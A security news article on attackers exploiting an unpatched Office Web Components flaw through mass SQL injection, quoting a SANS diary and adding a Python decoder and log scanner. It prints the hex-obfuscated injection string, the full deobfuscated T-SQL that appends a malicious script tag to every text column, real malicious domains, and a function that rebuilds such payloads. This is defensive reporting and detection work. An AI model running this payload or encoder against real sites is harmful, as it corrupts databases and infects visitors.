Office Web Components Flaw Used in SQL Injection Attacks

Attackers have begun using the unpatched vulnerability in Microsoft’s Office Web Components in SQL injection attacks. The vulnerability, which only became public this week, affects millions of users running a number of different versions of Windows, Office and Internet Explorer. The SANS Internet Storm Center said it is receiving reports of SQL injection attacks exploiting the vulnerability and using obfuscated code.

The attacks on the Office Web Components vulnerability don't come as a surprise, and they follow the typical arc of these campaigns: a mass SQL injection plants a script tag in a site's database, and the injected script delivers the browser exploit to visitors. From the SANS ISC blog:

The SQL injection attempt looks very much like the one we've been seeing for months; the attacker blindly tries to inject obfuscated SQL code:

';DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x44004500430…F007200 AS NVARCHAR(4000));
EXEC(@S);

After deobfuscation of the CAST function input, the following SQL code is revealed:

DECLARE @T varchar(255),@C varchar(255)
-- enumerate every text-like column (99=ntext, 35=text, 231=nvarchar, 167=varchar) of every user table (xtype='u')
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u'
  and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  -- append the script tag to the existing value of each such column
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=hxxp://f1y.in/j.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

As you can see, they are injecting a script code pointing to f1y.in, which is a known bad domain. This script contains links to two other web sites (www.jatrja.com and js.tongji.linezing.com) serving malicious JavaScript that, besides exploits for some older vulnerabilities, also include the exploit for the OWC vulnerability.

The exploits end up downloading a Trojan (of course, what else) which currently has pretty bad detection (VT link) – only 15 AV programs detecting it, luckily, some major AV vendors are there.
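The CAST(0x… AS NVARCHAR(4000)) trick quoted above works because NVARCHAR is UTF-16LE, so every ASCII character of the payload becomes one byte followed by 0x00 (the page's hex begins 44 00 45 00 43 00, which spells "DEC"). The following Python is an added example, not code from the SANS ISC diary or from Threatpost: it rebuilds an injection string of that shape from a constructed plaintext (using the reserved name example.invalid rather than the real malicious domain), decodes such blobs back to T-SQL, and flags the catalog-enumeration and cursor-driven mass-update pattern in constructed web server log lines. Log format, field names and the indicator names are this example's own assumptions.

```python
"""Decode and detect hex-obfuscated T-SQL injection of the kind quoted above.

Added example, not from the SANS ISC diary or the article. Domain names,
log lines and indicator names are constructed for illustration.
"""
from __future__ import annotations

import re
import urllib.parse

# Constructed plaintext in the style of the deobfuscated payload on the page.
# example.invalid is a reserved name standing in for the attacker's host.
PLAINTEXT_PAYLOAD = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,"
    "syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 "
    "or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor "
    "INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']="
    "rtrim(convert(varchar,['+@C+']))+''<script src=http://example.invalid/j.js>"
    "</script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor "
    "DEALLOCATE Table_Cursor"
)


def obfuscate(tsql: str) -> str:
    """Encode T-SQL the way the attackers do: UTF-16LE bytes as a 0x hex literal,
    CAST to NVARCHAR(4000) and handed to EXEC, after a quote that closes the
    application's own string literal."""
    hex_blob = tsql.encode("utf-16-le").hex().upper()
    return (f"';DECLARE @S NVARCHAR(4000);"
            f"SET @S=CAST(0x{hex_blob} AS NVARCHAR(4000));EXEC(@S);--")


CAST_HEX_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)", re.IGNORECASE)


def decode_cast_hex(sql_fragment: str) -> list[str]:
    """Return the decoded text of every CAST(0x... AS [N]VARCHAR) in the fragment.

    NVARCHAR blobs are UTF-16LE (hence the 00 after every ASCII byte); plain
    VARCHAR blobs are single-byte and are decoded here as cp1252 (assumption:
    the server's default Windows code page)."""
    decoded = []
    for hex_blob, sql_type in CAST_HEX_RE.findall(sql_fragment):
        if len(hex_blob) % 2:
            hex_blob = hex_blob[:-1]  # truncated capture: drop the dangling nibble
        raw = bytes.fromhex(hex_blob)
        codec = "utf-16-le" if sql_type.upper().startswith("N") else "cp1252"
        decoded.append(raw.decode(codec, errors="replace"))
    return decoded


# Indicators of the mass-update pattern; names are this example's own.
INDICATORS = {
    "catalog_enumeration": re.compile(r"\bsysobjects\b.*\bsyscolumns\b", re.I | re.S),
    "cursor_mass_update": re.compile(r"\bCURSOR\s+FOR\b.*\bupdate\b", re.I | re.S),
    "script_tag_payload": re.compile(r"<script\s+src=", re.I),
}


def classify(decoded_sql: str) -> list[str]:
    """Names of the indicators that match the decoded T-SQL."""
    return [name for name, rx in INDICATORS.items() if rx.search(decoded_sql)]


REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')


def scan_log(lines: list[str]) -> list[tuple[int, str, list[str]]]:
    """Return (line_no, decoded_sql, indicators) for each request whose URL-encoded
    query string carries a CAST(0x...) blob that decodes to an indicator hit."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urllib.parse.unquote_plus(m.group(1))
        for sql in decode_cast_hex(target):
            hits = classify(sql)
            if hits:
                findings.append((n, sql, hits))
    return findings


# Constructed access-log lines (Apache combined style): one benign, one injected.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jul/2009:14:02:11 +0000] "GET /products.asp?id=42 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [10/Jul/2009:14:02:15 +0000] "GET /products.asp?id=42'
    + urllib.parse.quote(obfuscate(PLAINTEXT_PAYLOAD)) + ' HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for line_no, sql, hits in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(hits)}")
        print("  decoded:", sql[:80], "...")
```

The regex is deliberately narrow to the CAST-hex-EXEC shape; blind injections of this family vary the surrounding SQL, so in practice the decoder output, not the encoded request, is what detection rules should match on.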

There is no patch right now for the Office Web Components vulnerability, but Microsoft has released an advisory on the issue, along with instructions for a workaround. The workaround does not fix the vulnerable code; it sets the kill bit for the affected Office Web Components ActiveX controls so that Internet Explorer refuses to instantiate them, which blocks the browser-based attack path described above.